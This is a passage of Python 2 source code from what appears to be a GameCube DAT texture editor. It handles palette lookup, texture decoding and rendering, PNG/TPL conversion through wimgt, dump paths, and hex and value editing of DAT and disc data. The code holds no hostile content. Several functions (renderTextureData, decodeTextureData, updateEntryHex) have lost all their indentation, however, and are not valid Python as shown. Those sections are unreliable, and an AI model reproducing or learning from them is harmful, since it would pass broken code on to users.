			return ( imageDataStruct.paletteDataOffset, imageDataStruct.paletteHeaderOffset, 0x200, 2, 256 )

	# Proceeding to check within standard DAT/USD files.
	# Walk upward from the image data block, through each of its parent image headers.
	headerOffsets = datFile.getStruct( imageDataOffset ).getParents()
	paletteHeaderStruct = None

	for imageHeaderOffset in headerOffsets:
		imageDataHeader = datFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderOffset, printWarnings=False )
		if not imageDataHeader: continue

		for headerParentOffset in imageDataHeader.getParents():
			# Test for a Texture Struct
			textureStruct = datFile.initSpecificStruct( hsdStructures.TextureObjDesc, headerParentOffset, printWarnings=False )

			if textureStruct:
				# Texture Struct Found; initialize the child palette header structure
				paletteHeaderOffset = textureStruct.getValues()[22]
				paletteHeaderStruct = datFile.initSpecificStruct( hsdStructures.PaletteObjDesc, paletteHeaderOffset, textureStruct.offset )
				break

			else:
				# Test for an Image Data Array structure
				imageHeaderArrayStruct = datFile.initSpecificStruct( hsdStructures.ImageHeaderArray, headerParentOffset, printWarnings=False )

				if imageHeaderArrayStruct:
					# Get the parent Texture Animation Struct, to get the palette header array offset
					texAnimStructOffset = imageHeaderArrayStruct.getAnyDataSectionParent()
					texAnimStruct = datFile.initSpecificStruct( hsdStructures.TexAnimDesc, texAnimStructOffset, printWarnings=False )

					if texAnimStruct:
						# This texture's position in the image header array corresponds to its palette's position in the palette header array
						paletteIndex = imageHeaderArrayStruct.getValues().index( imageHeaderOffset )

						# Make sure there is a palette header array structure (there may not be one if a palette is shared!)
						if texAnimStruct.offset + 0x10 in datFile.pointerOffsets:
							# Palette header array struct present. Get the corresponding palette header offset and structure
							paletteHeaderArrayOffset = texAnimStruct.getValues()[4]
							paletteHeaderPointerOffset = paletteHeaderArrayOffset + ( paletteIndex * 4 )
							paletteHeaderOffset = struct.unpack( '>I', datFile.getData(paletteHeaderPointerOffset, 4) )[0] # Grabbing 4 bytes and unpacking them
							paletteHeaderStruct = datFile.initSpecificStruct( hsdStructures.PaletteObjDesc, paletteHeaderOffset, paletteHeaderArrayOffset )

						elif paletteIndex == 0: # The first texture should have a normal Texture struct as well, so just move on to that.
							continue

						else: # Must share a palette with the first texture
							# Get the image data structure for the first texture in the array
							imageDataHeader = datFile.initSpecificStruct( hsdStructures.ImageObjDesc, imageHeaderArrayStruct.values[0] )
							imageDataOffset = imageDataHeader.getValues()[0]
							imageDataStruct = datFile.initDataBlock( hsdStructures.ImageDataBlock, imageDataOffset, imageDataHeader.offset )

							# Check the image data's parents to get the other image data header (the one that leads to a Texture Struct)
							for headerOffset in imageDataStruct.getParents().difference( (imageDataHeader.offset,) ): # Excluding the image data header above
								imageDataHeader = datFile.initSpecificStruct( hsdStructures.ImageObjDesc, headerOffset, printWarnings=False )
								if not imageDataHeader: continue

								for headerParentOffset in imageDataHeader.getParents():
									textureStruct = datFile.initSpecificStruct( hsdStructures.TextureObjDesc, headerParentOffset, printWarnings=False )
									if not textureStruct: continue

									# Texture Struct Found; initialize the child palette header structure
									paletteHeaderOffset = textureStruct.getValues()[22]
									paletteHeaderStruct = datFile.initSpecificStruct( hsdStructures.PaletteObjDesc, paletteHeaderOffset, textureStruct.offset )
									break

								if paletteHeaderStruct: break

						# Nothing more to gain from checking other parents of this image header
						break

		if paletteHeaderStruct: break

	if paletteHeaderStruct:
		# Found a palette header; pull the data offset/type/count from it, and measure the data block's length
		paletteDataOffset, paletteType, _, colorCount = paletteHeaderStruct.getValues()
		paletteLength = datFile.getStructLength( paletteDataOffset )
		return ( paletteDataOffset, paletteHeaderStruct.offset, paletteLength, paletteType, colorCount )
	else:
		return ( -1, -1, None, None, None )
def getPaletteData( datFileObj, imageDataOffset=-1, paletteDataOffset=-1, imageData=None, imageType=-1 ):
	""" Gets palette data from the file, looking up palette info if needed. If image data is provided, it is checked
		to determine how many colors are actually used (colorCount from the palette data header cannot be trusted).

		Provide either imageDataOffset (so the palette location can be looked up via getPaletteInfo),
		or paletteDataOffset directly (in which case the returned paletteType will be -1, since it
		cannot be determined here). Returns a ( paletteData, paletteType ) tuple. """

	# Get the offset of the palette data, if not provided
	if paletteDataOffset == -1:
		assert imageDataOffset != -1, 'Image data offset not provided to get palette data!'
		paletteDataOffset, _, paletteLength, paletteType, colorCount = getPaletteInfo( datFileObj, imageDataOffset )
	else:
		paletteLength = datFileObj.getStructLength( paletteDataOffset )
		paletteType = -1
		colorCount = -1

	if imageData:
		# Build an array of the palette indices actually referenced by the image data,
		# so the real color count can be determined from the highest index used.
		if imageType == 8: # Break up every byte into two 4-bit values
			paletteIndexArray = [ x for i in imageData for x in (i>>4, i&0b1111) ]
		elif imageType == 9: # Can just use the original bytearray (each entry is 1 byte)
			paletteIndexArray = imageData
		elif imageType == 10: # Combine half-word bytes
			paletteIndexArray = struct.unpack( '>{}H'.format(len(imageData)/2), imageData )
		else:
			raise Exception( 'Invalid image type given to getPaletteData: ' + str(imageType) )

		colorCount = max( paletteIndexArray ) + 1
		paletteData = datFileObj.getData( paletteDataOffset, colorCount * 2 ) # All palette types are two bytes per color

	else:
		# Without the image data, we can't really trust the color count, especially for some older texture hacks,
		# so fall back on the full measured length of the palette data block.
		assert paletteLength, 'Invalid palette length to get palette data: ' + str(paletteLength)
		paletteData = datFileObj.getData( paletteDataOffset, paletteLength )

	return paletteData, paletteType
def renderTextureData( imageDataOffset, width, height, imageType, imageDataLength, allowImageDumping=True ):
""" Decodes image data from the globally loaded DAT file at a given offset and creates an image out of it. This then
stores/updates the full image and a preview/thumbnail image (so that they're not garbage collected) and displays it in the GUI.
The image and its info is then displayed in the DAT Texture Tree tab's treeview (does not update the Dat Texture Tree subtabs).
allowImageDumping is False when this function is used to 're-load' image data,
(such as after importing a new texture, or modifying the palette of an existing one),
so that image modifications don't overwrite texture dumps. """
#tic = time.clock()
problemWithImage = False
try:
imageData = globalDatFile.getData( imageDataOffset, imageDataLength )
if imageType == 8 or imageType == 9 or imageType == 10: # Gather info on the palette.
paletteData, paletteType = getPaletteData( globalDatFile, imageDataOffset )
else:
paletteData = ''
paletteType = None
newImg = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
newImg.deblockify() # This decodes the image data, creating an rgbaPixelArray.
# Create an image with the decoded data
textureImage = Image.new( 'RGBA', (width, height) )
textureImage.putdata( newImg.rgbaPixelArray )
except Exception as errMessage:
print 'Unable to make out a texture for data at', uHex(0x20+imageDataOffset)
print errMessage
problemWithImage = True
# toc = time.clock()
# print 'time to decode image for', hex(0x20+imageDataOffset) + ':', toc-tic
# Store the full image (or error image) so it's not garbage collected, and generate the preview thumbnail.
if problemWithImage:
# The error image is 64x64, so it doesn't need to be resized for the thumbnail.
Gui.datTextureTree.fullTextureRenders[imageDataOffset] = Gui.imageBank( 'noImage' )
Gui.datTextureTree.textureThumbnails[imageDataOffset] = Gui.imageBank( 'noImage' )
else:
if allowImageDumping and generalBoolSettings['dumpPNGs'].get():
textureImage.save( buildTextureDumpPath(globalDatFile, imageDataOffset, imageType, '.png') )
Gui.datTextureTree.fullTextureRenders[imageDataOffset] = ImageTk.PhotoImage( textureImage )
textureImage.thumbnail( (64, 64), Image.ANTIALIAS )
Gui.datTextureTree.textureThumbnails[imageDataOffset] = ImageTk.PhotoImage( textureImage )
# If this item has already been added to the treeview, update the preview thumbnail of the texture.
iid = str( imageDataOffset )
if Gui.datTextureTree.exists( iid ):
Gui.datTextureTree.item( iid, image=Gui.datTextureTree.textureThumbnails[imageDataOffset] )
if not problemWithImage: return True
else: return False
def decodeTextureData( textureProperties, datFileObj, resultQueue, dumpImage ):
""" Only used when multi-process texture decoding is enabled.
Decodes texture data from the globally loaded DAT file at a given offset and creates a viewable image. The finished image
is placed into a queue for rendering to the GUI. This is because this function will be run in a separate process for
performance gains, however only the main thread may be allowed to do any GUI updates (or else there may be freezes).
The dumpImage argument should be False when this function is used to 're-load' image data,
(such as after importing a new texture, or modifying the palette of an existing one), so that image
modifications don't overwrite original texture dumps. Until the next time the program is opened, anyway. """
try:
#print 'processing', hex(0x20+imageDataOffset), 'with', multiprocessing.current_process().name
# tic = time.clock()
imageDataOffset, width, height, imageType, imageDataLength = textureProperties
imageData = datFileObj.getData( imageDataOffset, imageDataLength )
if imageType == 8 or imageType == 9 or imageType == 10: # Gather info on the palette.
paletteData, paletteType = getPaletteData( datFileObj, imageDataOffset )
else:
paletteData = ''
paletteType = None
# print 'time to resolve palette:', time.clock() - tic
# tic = time.clock()
# print '\n\tbeginning decoding', hex(len(imageData)), 'data at offset', hex(imageDataOffset)
newImg = tplDecoder( '', (width, height), imageType, paletteType, imageData, paletteData )
newImg.deblockify() # This decodes the image data, creating an rgbaPixelArray.
# from v5.3
textureImage = Image.new( 'RGBA', (width, height) )
textureImage.putdata( newImg.rgbaPixelArray )
#textureImage = Image.new( 'RGBA', (width, height) )
#byteStringData = ''.join([chr(pixel[0])+chr(pixel[1])+chr(pixel[2])+chr(pixel[3]) for pixel in newImg.rgbaPixelArray])
#rawImageData = (c_ubyte * 4 * width * height).from_buffer_copy(byteStringData)
#textureImage = Image.frombuffer( 'RGBA', (width, height), byteStringData, 'raw', 'RGBA', 0, 1 )
#textureImage = Image.fromarray( newImg.rgbaPixelArray, 'RGBA' )
#textureImage = Image.frombytes( 'RGBA', (width, height), bytes(newImg.decodedImage) )
# toc = time.clock()
# print 'time to decode image: ', toc-tic, ' for', hex(0x20+imageDataOffset)
# tic = time.clock()
if dumpImage:
try:
textureImage.save( buildTextureDumpPath(datFileObj, imageDataOffset, imageType, '.png') )
except Exception as err:
print 'Unable to create texture dump:'
print err
# print 'time to dump texture:', time.clock()-tic
# Add the result into the queue
#if not shutdownEvent.is_set():
resultQueue.put( (textureImage, imageDataOffset) )
#root.event_generate( '<<message>>', when='mark' )
except Exception as err:
print 'Failure during image decoding:'
print err
resultQueue.put( (None, imageDataOffset) )
def getImageFileAsPNG( filepath ): # may be depricated
	""" Reads a PNG or TPL image file from disk and returns a ( status, imageHex ) tuple, where
		imageHex is the file's data, as PNG, in hex-string form. TPL files are converted to PNG
		via the external wimgt program. On failure, status describes the problem instead. """

	if not os.path.exists( filepath ):
		return ( 'filepath for getImageFileAsPNG not found', 'noFileFound' )

	filename = os.path.split( filepath )[1]
	fileFormat = os.path.splitext( filename )[1].lower()

	with open( filepath, 'rb' ) as binaryFile:
		if fileFormat == '.tpl':
			status = 'formatSupported' # Conversion is handled below, after the file is closed
		elif fileFormat == '.png':
			# Get the image data.
			binaryFile.seek(0)
			imageHex = hexlify( binaryFile.read() ) # This would actually be a bytes string. might need to fix that
			status = 'dataObtained'
		else:
			imageHex = ''
			status = 'formatUnsupported' # Not a PNG or TPL.
	# File is closed for reading.

	# TPL conversion is not performed in the if-then above so that the file can first be closed.
	if status != 'formatUnsupported' and fileFormat == '.tpl':
		## Convert the TPL image to PNG format.
		( exitCode, outputStream ) = cmdChannel( '"' + wimgtPath + '" copy "' + filepath + '" - -x .png' )

		if exitCode == 0:
			encodedStream = hexlify( outputStream )
			startOfData = encodedStream.find('89504e470d0a1a0a') ## 16 char PNG file ID.
			imageHex = encodedStream[startOfData:]
			status = 'dataObtained'
		else:
			status = 'failed wimgt conversion'
			imageHex = outputStream

	return ( status, imageHex )
def getImageFileAsTPL( filepath, originalTextureType ):
	""" Reads a PNG or TPL image file from disk and returns its contents broken into the pieces needed
		for insertion into a DAT: ( status, imageHeader, imageData, paletteHeader, paletteData ), all as
		hex strings (minus the file-relative offsets normally found in the headers). PNG files are
		converted to TPL via the external wimgt program, with the encoding chosen from the texture's
		intended in-game image type; palette-based types are additionally scanned for transparency.

		originalTextureType is used as a fallback when the image type cannot be parsed from the filename. """

	# Check what formatting (image type) the texture should have in-game, and the current file format
	imageType = codecBase.parseFilename( os.path.basename( filepath ) )[0]
	fileFormat = os.path.splitext( filepath )[1].lower()
	if imageType == -1: imageType = originalTextureType

	imageHeader = ''
	imageData = ''
	paletteHeader = ''
	paletteData = ''

	with open( filepath.replace('\\', '/') , 'rb' ) as binaryFile:
		if fileFormat == '.tpl':
			# Get image attributes. Offset 0xC of a TPL holds the image header offset,
			# followed by the palette header offset.
			binaryFile.seek( 0xC )
			imageHeaderAddress = toInt( binaryFile.read(4) )
			paletteHeaderOffset = toInt( binaryFile.read(4) )
			binaryFile.seek( paletteHeaderOffset )
			paletteEntries = hexlify( binaryFile.read(2) )
			binaryFile.seek( 4, 1 ) # Seek from the current location.
			paletteType = '0000' + hexlify( binaryFile.read(2) )
			binaryFile.seek( imageHeaderAddress )
			height = hexlify( binaryFile.read(2) )
			width = hexlify( binaryFile.read(2) )
			#imageType = hexlify( binaryFile.read(4) )
			#imageDataOffset = toInt( binaryFile.read(4) )
			# Read the whole file from just past the 4-byte file identifier
			binaryFile.seek( 4 )
			fileBinary = hexlify( binaryFile.read() )
			status = 'dataObtained'
		elif fileFormat == '.png':
			# Get image attributes from the PNG's IHDR chunk (starting at offset 0x10).
			binaryFile.seek(16)
			width = hexlify( binaryFile.read(4) )[4:]
			height = hexlify( binaryFile.read(4) )[4:]
			bitDepth = toInt( binaryFile.read(1) )
			colorType = toInt( binaryFile.read(1) )
			if colorType == 3: # The image is palette based.
				pngBinary = hexlify( binaryFile.read() )
				status = 'formatSupported'
			else:
				status = 'formatUnsupported'

	# If the file is a PNG, convert it to TPL.
	if status != 'formatUnsupported' and fileFormat == '.png':
		## Set the appropriate encoding (the wimgt name for each image type).
		if imageType == 0: encoding='i4'
		elif imageType == 1: encoding='i8'
		elif imageType == 2: encoding='ia4'
		elif imageType == 3: encoding='ia8'
		elif imageType == 4: encoding='rgb565'
		elif imageType == 5: encoding='rgb5a3'
		elif imageType == 6: encoding='rgba32'
		elif imageType == 8: encoding='c4'
		elif imageType == 9: encoding='c8'
		elif imageType == 10: encoding='c14x2'
		elif imageType == 14: encoding='cmpr'
		else:
			return ( 'imageTypeNotFound', '', '', '', '' )

		# If the image uses a palette, check if it contains transparency. Start by checking the colorType.
		# Then, if an alpha channel is not found, fall back on scanning the palette for magenta.
		# (The standard check on the PNG's colorType will not reveal whether the texture should have
		# transparency for a particular palette index. And if a palette is present, then there cannot be
		# an alpha channel.) Finally, if a palette is found, also check for the tRNS ancillary transparency chunk.
		dataWithAdHocPalette = False
		if imageType == 8 or imageType == 9 or imageType == 10:
			transparencyDetected = False
			if colorType == 4 or colorType == 6: ## The image has an alpha channel.
				transparencyDetected = True
				dataWithAdHocPalette = True ## Mark that the palette will be created on-the-fly.
			elif colorType == 3:
				## The image has a palette. Transparency will be evaluated by scanning for magenta.
				startOfPalette = pngBinary.find('504c5445') ## Search for palette by the Chunk Type, PLTE.
				if startOfPalette != -1:
					paletteLength = int( int(pngBinary[startOfPalette-8:startOfPalette], 16)*2 ) ## Palette length, in nibbles.
					##paletteEntries = paletteByteLength/3
					palette = pngBinary[startOfPalette+8:startOfPalette+8+paletteLength]
					## Iterate over the palette entries, looking for magenta ('ff00ff')
					for i in xrange(0, paletteLength, 6): ## Uses a step of 6, which encompasses one RGB palette entry.
						if palette[i:i+6] == 'ff00ff':
							transparencyDetected = True
							break
					if not transparencyDetected:
						## One last check for transparency....
						if pngBinary.find('74524e53') != -1: ## Search for ancillary transparency chunk (Chunk Type tRNS).
							transparencyDetected = True
				else: ## Image should have a palette, but one was not found.
					return ( 'formatUnsupported', '', '', '', '' )
			else:
				## colorType is 0 or 2 (i.e. no palette or alpha channel detected). Assume correct.
				dataWithAdHocPalette = True ## Mark that the palette will be created on-the-fly.

			# Choose the palette encoding based on whether any transparency was found
			if transparencyDetected:
				encoding = encoding + '.P-RGB5A3'
				paletteType = '00000002'
			else:
				encoding = encoding + '.P-RGB565'
				paletteType = '00000001'

		## With the collected image info, convert the image to TPL format.
		( exitCode, outputStream ) = cmdChannel( '"' + wimgtPath + '" copy "' + filepath + '" - -x tpl.' + encoding )
		if exitCode == 0:
			# '0020af30' is the TPL file identifier; keep only the data following it
			fileBinary = hexlify( outputStream ).split('0020af30')[1]
			if dataWithAdHocPalette: status = 'dataWithAdHocPalette'
			else: status = 'dataObtained'
		else: return ( exitCode, outputStream, '', '', '' )

	## At this point, the file's binary should be standardized as a hex array, while missing the first 4 bytes.
	if status == 'dataObtained' or status == 'dataWithAdHocPalette':
		if imageType == 8 or imageType == 9 or imageType == 10:
			## Image has a palette that needs moving.
			## Since the file identifier has been removed, 4 bytes need to be subtracted from any offset relative to the file beginning.
			## Indexing of the hex string is per nibble, not per byte, so intergers for iteration need to be doubled.
			imageHeaderOffset = int(fileBinary[16:24], 16) ## Hex string to integer conversion of 4 bytes.
			imageHeaderAddress = (imageHeaderOffset - 4)*2

			## Separate out the palette, change the magenta to transparent, and change lime green to the drop-shadow color.
			paletteData = fileBinary[56:imageHeaderAddress]
			paletteLength = len(paletteData)
			paletteEntries = paletteLength/4
			for i in xrange(paletteLength, 0, -4): ## Iterate backwards through the palette data, seeking magenta.
				if paletteData[i-4:i] == 'fc1f':
					paletteData = paletteData[:i-4] + '0000' + paletteData[i:] ## Replace magenta with full transparency.
					break
			for i in xrange(paletteLength, 0, -4): ## Iterate backwards through the palette data, seeking lime green.
				if paletteData[i-4:i] == '83e0':
					paletteData = paletteData[:i-4] + '3000' + paletteData[i:] ## Replace lime green with the drop-shadow.
					break

			imageDataOffset = int(fileBinary[imageHeaderAddress + 16:imageHeaderAddress + 24], 16)
			imageData = fileBinary[(imageDataOffset - 4)*2:] ## 0x260 = 608, 608 - the offset of 8 lost with the file identifier = 600.
			paletteHeader = paletteType + '00000000' + "{0:0{1}X}".format(paletteEntries, 4) # This is in the format that would appear in a file, but without the paletteDataOffset.
		else:
			## No palette. Return just the image data.
			imageData = fileBinary[120:] ## 0x40 -> 64. 2(64 - 4) = 120
			imageHeader = width + height + "{0:0{1}X}".format(imageType, 8) # This is in the format that would appear in a file, but without the imageDataOffset.

	## The returned imageData will be a bytearray, except for cases with conversion errors, in which case it will be a string.
	return (status, imageHeader, imageData, paletteHeader, paletteData) # All returned values are strings.
def buildTextureDumpPath( datFileObj, imageDataOffset, imageType, extension ):
	""" Creates a save/destination path for new image files being dumped from the program.
		Only used for dumping images from a globally loaded DAT file (not banners).

		The resulting path has the form:
			<texDumpsFolder>/<gameID>/<datFilename>/<datFilename>_<offset>_<imageType><extension>
		Any missing folders along that path are created.

		Fix: the path was previously assembled with hard-coded backslashes, which only works on
		Windows; os.path.join now selects the correct separator per-platform. """

	sourceDatFilename = os.path.basename( datFileObj.path ).split('_')[-1]
	newFileName = sourceDatFilename + '_' + uHex(imageDataOffset + 0x20) + '_' + str(imageType) + extension

	# Get the Game ID if this file was loaded from a disc.
	if datFileObj.source == 'disc' and globalDiscDetails['gameId'] != '':
		# Means an ISO has been loaded, and (looking at the file path) the current dat is not from an outside standalone file.
		gameID = globalDiscDetails['gameId']
	else: gameID = 'No Associated Disc'

	# Construct the destination file path, and create the folders if they don't already exist.
	destinationFolder = os.path.join( texDumpsFolder, gameID, sourceDatFilename )
	if not os.path.exists( destinationFolder ): os.makedirs( destinationFolder )

	return os.path.join( destinationFolder, newFileName )
def updateEntryHex( event, widget=None ):
""" Updates hex data in a hex entry field to the currently loaded DAT file.
Able to update multiple locations in the file if widget.offset is a list of offsets. """
# Get the entry widget containing details on this edit
if not widget:
widget = event.widget
# Validate the input
newHex = widget.get().zfill( widget.byteLength * 2 ).upper() # Pads the string with zeroes to the left if not enough characters
if not validHex( newHex ):
msg( 'The entered text is not valid hexadecimal!' )
return
# Confirm whether updating is necessary by checking if this is actually new data for any of the offset locations
if type( widget.offsets ) == list:
for offset in widget.offsets:
currentFileHex = hexlify( globalDatFile.getData(offset, widget.byteLength) ).upper()
if currentFileHex != newHex: # Found a difference
break
else: # The loop above didn't break; no change found
return # No change to be updated
else: # The offsets attribute is just a single value (the usual case)
currentFileHex = hexlify( globalDatFile.getData(widget.offsets, widget.byteLength) ).upper()
if currentFileHex == newHex:
return # No change to be updated
# Get the data as a bytearray, and check for other GUI compoenents that may need to be updated
newData = bytearray.fromhex( newHex )
valueEntryWidget = getattr( widget, 'valueEntryWidget', None )
formatting = getattr( widget, 'formatting', None )
decodedValue = None
if len( newData ) != widget.byteLength: # Thanks to the zfill above, this should only happen if the hex entry is too long
msg( 'The new value must be ' + str( widget.byteLength ) + ' characters long.' )
return
if valueEntryWidget and formatting:
# Check that the appropriate value can be decoded from this hex (if formatting is available)
try:
decodedValue = struct.unpack( '>' + formatting, newData )
except Exception as err:
# Construct and display an error message for the user
dataTypes = { '?': 'a boolean', 'b': 'a signed character', 'B': 'an unsigned character', # 1-byte
'h': 'a signed short (halfword)', 'H': 'an unsigned short', # 2-bytes
'i': 'a signed integer', 'I': 'an unsigned integer', 'f': 'a float' } # 4-bytes
if formatting in dataTypes:
expectedLength = struct.calcsize( formatting )
msg( 'The entered value is invalid for {} value (should be {} byte(s)).'.format( dataTypes[formatting], expectedLength ) )
else: # I tried
msg( 'The entered value is invalid.' )
print err
return
# Change the background color of the widget, to show that changes have been made to it and are pending saving.
widget.configure( background='#faa' )
# If this entry has a color swatch associated with it, redraw it.
colorSwatchWidget = getattr( widget, 'colorSwatch', None )
if colorSwatchWidget:
#print 'recreating color swatch image with', newHex
widget.colorSwatch.renderCircle( newHex )
# Add the widget to a list, to keep track of what widgets need to have their background restored to white when saving.
global editedDatEntries
editedDatEntries.append( widget )
# Update the hex shown in the widget (in case the user-entered value was zfilled; i.e. was not long enough)
widget.delete( 0, 'end' )
widget.insert( 0, newHex )
# Update the data shown in the neighboring, decoded value widget
if decodedValue:
valueEntryWidget.delete( 0, 'end' )
valueEntryWidget.insert( 0, decodedValue )
valueEntryWidget.configure( background='#faa' )
editedDatEntries.append( valueEntryWidget )
# Replace the data in the file for each location
updateName = widget.updateName.replace( '\n', ' ' )
descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName
if type( widget.offsets ) == list:
for offset in widget.offsets:
globalDatFile.updateData( offset, newData, descriptionOfChange )
else: # The offsets attribute is just a single value (the usual case)
globalDatFile.updateData( widget.offsets, newData, descriptionOfChange )
updateProgramStatus( updateName + ' Updated' )
def updateEntryValue( event ):
	""" Formats a value in an entry field and updates it into the currently loaded DAT file.
		Able to update multiple locations in the file if widget.offset is a list of offsets.

		This is the decoded-value counterpart to updateEntryHex: the human-readable value
		entered by the user is encoded to hex (per the widget's struct formatting code),
		compared against the data currently in the file (nothing happens if unchanged),
		mirrored into the neighboring hex entry widget (if one exists), and then written
		into the loaded DAT file at each offset. """

	# A HexEditDropdown widget calls this directly, passing itself rather than a Tkinter event
	if event.__class__ == HexEditDropdown:
		widget = event
	else:
		widget = event.widget

	# Validate the entered value by making sure it can be correctly encoded
	try:
		formatting = widget.formatting
		if formatting == 'f':
			newHex = hexlify( struct.pack( '>f', float(widget.get()) ) ).upper()
		else:
			newHex = hexlify( struct.pack( '>' + formatting, int(widget.get()) ) ).upper()
	except Exception as err:
		# Construct and display an error message for the user
		dataTypes = { '?': 'a boolean', 'b': 'a signed character', 'B': 'an unsigned character', # 1-byte
					  'h': 'a signed short (halfword)', 'H': 'an unsigned short', # 2-bytes
					  'i': 'a signed integer', 'I': 'an unsigned integer', 'f': 'a float' } # 4-bytes
		if formatting in dataTypes:
			msg( 'The entered value is invalid for {} value.'.format( dataTypes[formatting] ) )
		else: # I tried
			msg( 'The entered value is invalid.' )
			print err
		return

	# Confirm whether updating is necessary by checking if this is actually new data for any of the offset locations
	if type( widget.offsets ) == list:
		for offset in widget.offsets:
			currentFileHex = hexlify( globalDatFile.getData(offset, widget.byteLength) ).upper()
			if currentFileHex != newHex: # Found a difference
				break
		else: # The loop above didn't break; no change found
			return # No change to be updated
	else: # The offsets attribute is just a single value (the usual case)
		currentFileHex = hexlify( globalDatFile.getData(widget.offsets, widget.byteLength) ).upper()
		if currentFileHex == newHex:
			return # No change to be updated

	# Change the background color of the widget, to show that changes have been made to it and are pending saving.
	# (A HexEditDropdown is a ttk widget, so it's marked as edited via a style rather than a background option.)
	if event.__class__ == HexEditDropdown:
		widget.configure( style='Edited.TMenubutton' )
	else:
		widget.configure( background='#faa' )

	# Add the widget to a list, to keep track of what widgets need to have their background restored to white when saving.
	global editedDatEntries
	editedDatEntries.append( widget )

	# Update the data shown in the neiboring widget
	hexEntryWidget = getattr( widget, 'hexEntryWidget', None )
	if hexEntryWidget:
		hexEntryWidget.delete( 0, 'end' )
		hexEntryWidget.insert( 0, newHex )
		hexEntryWidget.configure( background='#faa' )
		editedDatEntries.append( hexEntryWidget )

	# Replace the data in the file for each location
	newData = bytearray.fromhex( newHex )
	updateName = widget.updateName.replace( '\n', ' ' )
	descriptionOfChange = updateName + ' modified in ' + globalDatFile.fileName

	if type( widget.offsets ) == list:
		for offset in widget.offsets:
			globalDatFile.updateData( offset, newData, descriptionOfChange )
	else: # The offsets attribute is just a single value (the usual case)
		globalDatFile.updateData( widget.offsets, newData, descriptionOfChange )

	updateProgramStatus( updateName + ' Updated' )
def updateDiscDetails( event ):

	""" Called when Enter/Return is pressed in one of the Disc Details tab's text fields.
		Encodes the entered text and writes it into the target file -- either the loaded
		banner file (opening.bnr) or a file within the loaded disc (e.g. boot.bin) --
		padding the field with '0' nibbles up to its max length so that any longer,
		previously-saved text is fully overwritten.

		Returns 'break' to stop the Return keystroke from propagating to the widget
		(which would otherwise insert a line break), or None when Shift+Enter was used
		(so the keystroke propagates and creates the line break the user wanted). """

	offset = event.widget.offset # In this case, these ARE counting the file header
	maxLength = event.widget.maxByteLength
	targetFile = event.widget.targetFile # Defines the file this disc detail resides in. Will be a string of either 'opening.bnr' or 'boot.bin'

	# Return if the Shift key was held while pressing Enter (indicating the user wants a line break).
	modifierKeysState = event.state # An int. Check individual bits for mod key status'; http://infohost.nmt.edu/tcc/help/pubs/tkinter/web/event-handlers.html
	shiftDetected = (modifierKeysState & 0x1) != 0 # Checks the first bit of the modifiers
	if shiftDetected: return # Not using "break" on this one in order to allow event propagation

	# Determine what encoding to use for saving text
	if Gui.countryCode.get() == 'us': encoding = 'latin_1' # Decode assuming English or other European countries
	else: encoding = 'shift_jis' # The country code is 'jp', for Japanese.

	# Get the currently entered text as hex
	if event.widget.winfo_class() == 'TEntry' or event.widget.winfo_class() == 'Entry':
		inputBytes = event.widget.get().encode( encoding )
	else: inputBytes = event.widget.get( '1.0', 'end' )[:-1].encode( encoding ) # "[:-1]" ignores trailing line break
	newStringHex = hexlify( inputBytes )

	# Cancel if no banner file appears to be loaded (which means there's no disc with a boot.bin either).
	if not globalBannerFile: return 'break'

	# Get the data for the target file (Could be for boot.bin or opening.bnr)
	if targetFile == 'opening.bnr':
		targetFileData = globalBannerFile.data
	else: # Updating to disc.
		targetFileIid = scanDiscForFile( targetFile )

		if not targetFileIid:
			msg( targetFile + ' could not be found in the disc!' )
			return 'break'

		# Pull the file's current treeview entry values, so they can be re-written below with updated data
		_, entity, isoOffset, fileSize, isoPath, _, _ = Gui.isoFileTree.item( targetFileIid, 'values' )
		targetFileData = getFileDataFromDiscTreeAsBytes( targetFileIid )

	# Get the hex string of the current value/field in the file
	currentHex = hexlify( targetFileData[offset:offset+maxLength] )

	# Pad the end of the input string with empty space (up to the max string length), to ensure any other text in the file will be erased
	newPaddedStringHex = newStringHex + ( '0' * (maxLength * 2 - len(newStringHex)) )

	# Check if the value is different from what is already saved.
	if currentHex != newPaddedStringHex:
		updateName = event.widget.updateName

		# Validate the input length; Game ID must be exact, other fields just have a maximum
		if updateName == 'Game ID' and len( newStringHex ) != maxLength * 2:
			msg( 'The new value must be ' + str(maxLength) + ' characters long.' )
		elif len( newStringHex ) > maxLength * 2:
			msg( 'The text must be less than ' + str(maxLength) + ' characters long.' )
		else:
			# Change the background color of the widget, to show that changes have been made to it and are pending saving.
			event.widget.configure( background="#faa" )

			# Add the widget to a list, to keep track of what widgets need to have their background restored to white when saving.
			editedBannerEntries.append( event.widget )

			if targetFile == 'opening.bnr':
				descriptionOfChange = updateName + ' modified in ' + globalBannerFile.fileName
				globalBannerFile.updateData( offset, bytearray.fromhex( newPaddedStringHex ), descriptionOfChange )
			else:
				global unsavedDiscChanges
				targetFileData[offset:offset+maxLength] = bytearray.fromhex( newPaddedStringHex )
				# Store the modified file data back into the treeview item ('ram' source), and mark it as changed
				Gui.isoFileTree.item( targetFileIid, values=('Disc details updated', entity, isoOffset, fileSize, isoPath, 'ram', hexlify(targetFileData)), tags='changed' )
				unsavedDiscChanges.append( updateName + ' updated.' )

			updateProgramStatus( updateName + ' Updated' )

	return 'break' # Prevents the 'Return' keystroke that called this from propagating to the widget and creating a line break
def onTextureTreeSelect( event, iid='' ):

	""" Called when a texture is selected in the DAT Texture Tree tab (or when a selection is
		simulated for a given iid). Draws the texture to the main display, then enables,
		disables, and populates the Image/Palette/Model/Properties tabs depending on what
		structures are associated with the texture in the loaded DAT file. """

	# Ensure there is an iid, or do nothing
	if not iid:
		iid = Gui.datTextureTree.selection()
		if not iid: return
	iid = iid[-1] # Selects the lowest position item selected in the treeview if multiple items are selected.

	currentTab = Gui.root.nametowidget( Gui.imageManipTabs.select() )

	# Update the main display with the texture's stored image.
	drawTextureToMainDisplay( iid )

	# Collect info on the texture
	imageDataOffset, imageDataLength, width, height, imageType = parseTextureDetails( iid )
	imageDataStruct = globalDatFile.structs.get( imageDataOffset )
	if imageDataStruct:
		imageDataHeaderOffsets = imageDataStruct.getParents()

	# Determine whether to enable and update the Palette tab (types 8/9/10 are palettized formats).
	if imageType == 8 or imageType == 9 or imageType == 10:
		# Enable the palette tab and prepare the data displayed on it.
		Gui.imageManipTabs.tab( 1, state='normal' )
		populatePaletteTab( int(iid), imageDataLength, imageType )
	else:
		# No palette for this texture. Check the currently viewed tab, and if it's the Palette tab, switch to the Image tab.
		if currentTab == Gui.palettePane:
